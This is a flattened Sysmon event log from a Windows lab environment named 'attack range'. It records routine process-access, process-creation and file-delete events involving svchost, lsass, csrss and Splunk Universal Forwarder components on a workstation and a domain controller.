11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A30-6216-5C05-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A30-6216-5C05-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:44.218{4F8D34B0-1A30-6216-5C05-000000003902}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:45.905{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F29D169D2CF17DFD5AEBABEE3B4FCA2D,SHA256=DB0249D63EEDBCAF64036E0E2024439AA23EB173F289D51A003934F1A7050A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:45.187{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A84EF25E846708DD9F1CC2EBD6A7ACE,SHA256=B33B47A0A7829726EC2692FC9C01BA4CF95CC335D216FC6464240EDB066FE96C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:45.452{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5060AAE97785BA30B366C1E6F9872B1B,SHA256=5F2E0012284D22C6551B25A994261EE24CF857CB19E3BDBF21F20F76C0F75C57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:45.452{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28831638A9866CE338B42F04DCBC7F34,SHA256=097ECED25BA6406495498894F4D738456D892483516F770D43D67D7B120E8AD9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:45.217{4F8D34B0-1A30-6216-5D05-000000003902}34282720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.952{4F8D34B0-1A32-6216-5E05-000000003902}11484016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.921{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB53CA461EA48B8FD8DC585997BA776D,SHA256=DEC1BC990A4B4FAD8DC38321BE68FC0CEB756DDBFE9CED548FCA50E9210AF820,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.218{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.218{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:46.218{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D240E00829E1D817B66FEE39D43AF3E,SHA256=A2B2C8649FC6DDF30ABB2965C8A037F02D56FD1B1C3DFA2560ABBFB1AD2909B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.828{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1A32-6216-5E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1A32-6216-5E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1A32-6216-5E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:46.671{4F8D34B0-1A32-6216-5E05-000000003902}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000299418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 